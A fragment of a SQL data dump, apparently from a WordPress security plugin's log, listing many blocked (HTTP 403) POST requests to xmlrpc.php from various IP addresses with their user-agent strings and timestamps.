Firefox\\/41.0\"}','rnV02OX1D5wz8cpHJPQS4kIU',0,1681499353.8938,594,'','POST',403,0,515,0,1,'',0),('207.55.248.19',3476551699,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','DXO1I8f70Alaug6oNhiQHdSZ',0,1681499361.7344,573,'','POST',403,0,515,0,1,'',0),('162.219.176.3',2732306435,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','XdQ5SOpflteT92YoNs4P6Ggq',0,1681500478.6227,876,'','POST',403,0,515,0,1,'',0),('91.231.84.41',1541887017,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','dW03HBeEFs6P5DLuwXh8nRqQ',0,1681501677.6090,2875,'','POST',403,0,515,0,1,'',0),('34.87.13.139',576130443,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','PTl38NO9m4IQpvy2Me6LuXcW',0,1681503176.7378,885,'','POST',403,0,515,0,1,'',0),('189.203.144.160',3184234656,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','brvGMoXRi5lwYS4HzWmPE3OJ',0,1681503179.6745,615,'','POST',403,0,515,0,1,'',0),('141.98.18.59',2372014651,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','QoOq2fLbtJFvgypnk3cBN51T',0,1681503183.0865,1393,'','POST',403,0,515,0,1,'',0),('72.167.57.16',1218918672,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','4h7f5YLa8iKVrpDCbQlwBmuo',0,1681503183.3846,1387,'','POST',403,0,515,0,1,'',0),('41.193.5.58',700515642,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','lgZSEkTyouWd8J9nfmMhR6aY',0,1681503196.3294,771,'','POST',403,0,515,0,1,'',0),('74.208.59.184',1255160760,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','JOdwRky0ivICA821Zn4MzuXm',0,1681503203.3168,643,'','POST',403,0,515,0,1,'',0),('69.49.247.110',1160902510,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','YWCNbpSDano8hjrBEsPtcXJI',0,1681503205.5748,708,'','POST',403,0,515,0,1,'',0),('165.22.211.204',2769736652,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\"}','ZuIX3pQxbqsRO0V9cGAfYLHw',0,1681503212.0786,611,'','POST',403,0,515,0,1,'',0),('68.178.229.122',1152574842,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','wNohu35I1v0KsRjlOdGktiga',0,1681504581.0336,3547,'','POST',403,0,515,0,1,'',0),('45.77.243.188',760083388,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:17.0) Gecko\\/20100101 Firefox\\/20.6.14\"}','0EYzTdt8uogGNKyxPnqar9VI',0,1681504585.6090,722,'','POST',403,0,515,0,1,'',0),('34.80.163.64',575710016,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','sjrbGw2UfcI1JoEAxCBPlz5T',0,1681504590.5425,619,'','POST',403,0,515,0,1,'',0),('149.248.50.72',2516070984,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','2GbuWEiZV34rXOCacQypfsz1',0,1681504594.0656,579,'','POST',403,0,515,0,1,'',0),('104.207.254.152',1758461592,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko\\/20050915 Firefox\\/1.0.7\"}','QcS3JCuYxZlyH9PnhoXwt1s2',0,1681504596.6483,634,'','POST',403,0,515,0,1,'',0),('74.208.233.41',1255205161,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','SdxepA5F1YD0l6XfuiwULnZK',0,1681504600.9348,617,'','POST',403,0,515,0,1,'',0),('95.167.178.158',1604825758,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','S5ZJhYWHodNryFQ1bAT6c7u8',0,1681505266.6220,3122,'','POST',403,0,515,0,1,'',0),('46.38.249.174',774306222,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko\\/20100101 Firefox\\/47.0\"}','gPxstZ4KUkcWHOM9pjCdQfDo',0,1681505267.1847,3486,'','POST',403,0,515,0,1,'',0),('206.189.129.241',3468526065,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','OYiZhAwU7qxIHRMWfpazrQDj',0,1681505364.8907,624,'','POST',403,0,515,0,1,'',0),('63.142.251.6',1066334982,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','EhTc60LCPuM1qbkmliDIVO2z',0,1681507263.7190,2863,'','POST',403,0,515,0,1,'',0),('14.225.192.104',249675880,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','kwQ3e95jEJr1CgKs7H60yOcn',0,1681507264.4589,2848,'','POST',403,0,515,0,1,'',0),('178.21.17.239',2987725295,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','fSGELejW6Os8itvq0dr9ARXy',0,1681507280.8361,2698,'','POST',403,0,515,0,1,'',0),('92.205.2.176',1556939440,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','B07k2Qu1gnTXZfYO6AUDozeS',0,1681507285.6701,570,'','POST',403,0,515,0,1,'',0),('72.167.57.16',1218918672,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','5EFbWvZ1i9tQdCXm7Ln8kyzr',0,1681507290.4154,584,'','POST',403,0,515,0,1,'',0),('101.32.41.71',1696606535,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','qpO53MdAyVDeE7PGm2sFSX4v',0,1681507292.4250,611,'','POST',403,0,515,0,1,'',0),('74.208.59.164',1255160740,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','qOGNsX45BTJvRytIi0pV8CUK',0,1681507297.4703,2594,'','POST',403,0,515,0,1,'',0),('47.242.62.161',804404897,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko\\/20050915 Firefox\\/1.0.7\"}','ZAcpsLyYIXWqdUBOhRVbN0t9',0,1681507299.6779,1581,'','POST',403,0,515,0,1,'',0),('101.32.41.71',1696606535,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko\\/20100101 Firefox\\/18.0\"}','zWsGPF1RaDVqp6j49CZr2Snk',0,1681507299.8732,1489,'','POST',403,0,515,0,1,'',0),('185.2.5.88',3103917400,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','c9VjKPiOsuhXRSdZvyHtmoFC',0,1681507314.2462,583,'','POST',403,0,515,0,1,'',0),('82.165.86.47',1386567215,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','Jm2rlObNIct7PyCaLh8qg5K4',0,1681510866.4711,4612,'','POST',403,0,515,0,1,'',0),('207.180.207.149',3484733333,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','5fFZK2zM7Irkn93ciTlRqCJG',0,1681510871.9531,722,'','POST',403,0,515,0,1,'',0),('5.39.4.40',86443048,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','rgvY7hALKoZW69aHwfXxFGV4',0,1681510872.5885,692,'','POST',403,0,515,0,1,'',0),('38.242.129.230',653427174,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','BvgE0xDLsJlkn4hMKcX7ARdu',0,1681510880.2317,602,'','POST',403,0,515,0,1,'',0),('150.158.148.229',2526975205,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','xIoierhAsNMfXqBpg9SYP1Zn',0,1681510890.8249,558,'','POST',403,0,515,0,1,'',0),('185.2.5.88',3103917400,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','v02I9ChBwVd3RF5lNZgqkJXr',0,1681510892.7246,558,'','POST',403,0,515,0,1,'',0),('194.195.112.30',3267588126,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\\/20100101 Firefox\\/40.1\"}','ipJyswBt0MLOkrYnv3m2ZV4F',0,1681510900.5920,551,'','POST',403,0,515,0,1,'',0),('178.32.201.69',2988493125,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','dRfA9zlChJ0PpBGiQea3v6nZ',0,1681510901.3100,592,'','POST',403,0,515,0,1,'',0),('207.55.248.19',3476551699,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','yEgNekGCjlY472QSVh9svo1F',0,1681510905.3359,908,'','POST',403,0,515,0,1,'',0),('18.218.139.173',316312493,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','tdhm6uOLVTDH2e4iz1AyJpXq',0,1681510905.8823,817,'','POST',403,0,515,0,1,'',0),('34.80.163.64',575710016,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko\\/20100101 Firefox\\/63.0\"}','bA0yVr3PaYWqUcFdSpnZJCEO',0,1681510907.8036,585,'','POST',403,0,515,0,1,'',0),('50.62.137.47',842959151,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko\\/20100101 Firefox\\/18.0\"}','6sqjQpNWMeDh5ta0CGobEK8z',0,1681510909.3435,1115,'','POST',403,0,515,0,1,'',0),('80.244.168.40',1358211112,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','aQEN7J1reusUi8TtjhpvWxOL',0,1681510909.9431,1600,'','POST',403,0,515,0,1,'',0),('5.39.4.40',86443048,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','VKzrjkcAgpGxd2NXa16OUC9y',0,1681510910.4490,1227,'','POST',403,0,515,0,1,'',0),('195.28.11.220',3273395164,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','59GaCFbpstST2iINPRzZjfH4',0,1681510911.9273,575,'','POST',403,0,515,0,1,'',0),('173.231.207.89',2917650265,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','fHeNcQ03p7wPkatB5KjE4goS',0,1681510913.0418,559,'','POST',403,0,515,0,1,'',0),('82.223.115.237',1390375917,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','dLI58FeJy2njogmMvAXDt0Wi',0,1681510914.3178,580,'','POST',403,0,515,0,1,'',0),('128.14.142.233',2148437737,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko\\/20050915 Firefox\\/1.0.7\"}','aeyUZ3qtk7gm0KbCR9l4unJB',0,1681510919.7063,595,'','POST',403,0,515,0,1,'',0),('207.55.248.19',3476551699,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','ksG4JdbPg6ucNRAUzTBL3D0x',0,1681510923.3278,567,'','POST',403,0,515,0,1,'',0),('3.225.238.13',65138189,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','06BWAP5QDu8nJFX7bMj3Vtke',0,1681510934.3325,610,'','POST',403,0,515,0,1,'',0),('213.152.161.69',3583549765,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','KGOi7j8JT3ueBrXQ4vpldAoZ',0,1681511454.4752,3224,'','POST',403,0,515,0,1,'',0),('82.165.80.95',1386565727,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','yfIG9RE5UWDsq8nma2TgVd1B',0,1681513651.7879,3574,'','POST',403,0,515,0,1,'',0),('128.199.67.142',2160542606,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','zWicJVNsKdIL3tfX4uSE2yDl',0,1681513663.1132,575,'','POST',403,0,515,0,1,'',0),('79.139.59.17',1334524689,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','6ZfJg1OhuvCKwaWMtBkUEmNe',0,1681513672.8834,559,'','POST',403,0,515,0,1,'',0),('103.171.90.148',1739283092,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','3cgiytLAHeJ6MvZV7nUdFhN1',0,1681513677.3302,553,'','POST',403,0,515,0,1,'',0),('134.122.120.71',2256173127,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','ogCWJPOkcD0LNYa6KU3RApEf',0,1681513678.0481,549,'','POST',403,0,515,0,1,'',0),('81.88.53.58',1364735290,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','GUBZcWD8JyeFai579jdQkrRz',0,1681513681.4531,624,'','POST',403,0,515,0,1,'',0),('103.101.161.81',1734713681,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.90 Safari\\/537.36\"}','lrbTcvZQjp76dRMxVaPNkLqS',0,1681513682.2770,646,'','POST',403,0,515,0,1,'',0),('170.249.206.66',2868497986,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','kyvAnwEX5O0icKmHLJdCWThG',0,1681513683.9415,584,'','POST',403,0,515,0,1,'',0),('159.203.161.65',2680922433,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','OGaFrlpmP1bD63u2EYsACBTL',0,1681513691.0461,590,'','POST',403,0,515,0,1,'',0),('82.223.115.237',1390375917,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','giFIe6TJb5CXQwHrAqPNGflh',0,1681513692.3528,593,'','POST',403,0,515,0,1,'',0),('35.214.190.212',601276116,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.141 Safari\\/537.36\"}','u5ewI7JD2O9Gdhy8QnlV3bkW',0,1681513696.5577,1285,'','POST',403,0,515,0,1,'',0),('212.85.99.184',3562365880,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','tfJQI7APOpFZqvuXyWk42KTm',0,1681513696.6870,1215,'','POST',403,0,515,0,1,'',0),('31.172.80.82',531386450,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','7x0weZ9IjYWQOAJUfX4iLTnC',0,1681515129.5921,2465,'','POST',403,0,515,0,1,'',0),('182.50.151.70',3056768838,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','SxAYgCiGUz7yn3RwqWQMdXDJ',0,1681515128.1809,4466,'','POST',403,0,515,0,1,'',0),('43.155.103.11',731604747,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','zdF5YQa3qGyA4MRIwOvVcjDN',0,1681515129.0526,3602,'','POST',403,0,515,0,1,'',0),('178.32.201.69',2988493125,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','uPHktWw13Ix5v2qg7Jj4AMZN',0,1681515142.6988,546,'','POST',403,0,515,0,1,'',0),('103.146.176.238',1737666798,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','E5bxF72puGSsrCJZL4QAfehy',0,1681515150.3881,603,'','POST',403,0,515,0,1,'',0),('31.172.80.82',531386450,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-G960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','HiXQ1LxvFnrq2tVP7OMyRfwh',0,1681515162.0686,1390,'','POST',403,0,515,0,1,'',0),('75.119.135.6',1266124550,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.141 Safari\\/537.36\"}','AU8khx1Ir2bGz43PldNsfEwK',0,1681515162.2591,1284,'','POST',403,0,515,0,1,'',0),('148.66.145.137',2487390601,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.90 Safari\\/537.36\"}','jroNPg7DhmkvV9KueC48xFqw',0,1681515167.9920,570,'','POST',403,0,515,0,1,'',0),('65.109.50.60',1097675324,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','ab8XcRPT7mt2wosrx4eF9SBA',0,1681515175.3151,624,'','POST',403,0,515,0,1,'',0),('207.55.248.19',3476551699,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko\\/20100101 Firefox\\/18.0\"}','XyOEhkaz7fIQFrZSLj3Ac1ep',0,1681525896.5679,713,'','POST',403,0,515,0,1,'',0),('159.203.161.65',2680922433,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-G960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','ofbpUelHvBYJDQch0x3gaL2T',0,1681525906.3379,593,'','POST',403,0,515,0,1,'',0),('144.126.132.168',2424210600,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','Ht2TdiAXNLJDvw6BOxbs5ClG',0,1681525909.6622,580,'','POST',403,0,515,0,1,'',0),('66.42.49.228',1110061540,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','GCcdUT14F7NLDw3b9uKqsi0P',0,1681525913.4572,576,'','POST',403,0,515,0,1,'',0),('212.90.148.14',3562705934,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','OxHrS0WBNgUTXkywni9ZVmfP',0,1681525918.1165,619,'','POST',403,0,515,0,1,'',0),('199.59.90.4',3342555652,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','zcsUTd3pWJGFb0rxaI2Ny4Si',0,1681525927.1581,1232,'','POST',403,0,515,0,1,'',0),('199.59.90.4',3342555652,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','QR2eYtsMxiFa7T6CBXDPpJkq',0,1681525926.9435,1445,'','POST',403,0,515,0,1,'',0),('47.243.171.230',804498406,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','JuGe0yHZk2OhnFtvUwmoWMp6',0,1681525932.0412,625,'','POST',403,0,515,0,1,'',0),('144.126.132.168',2424210600,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','9W354MkwnR2vqtu1IzHUhgVx',0,1681525936.1395,618,'','POST',403,0,515,0,1,'',0),('92.205.2.176',1556939440,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 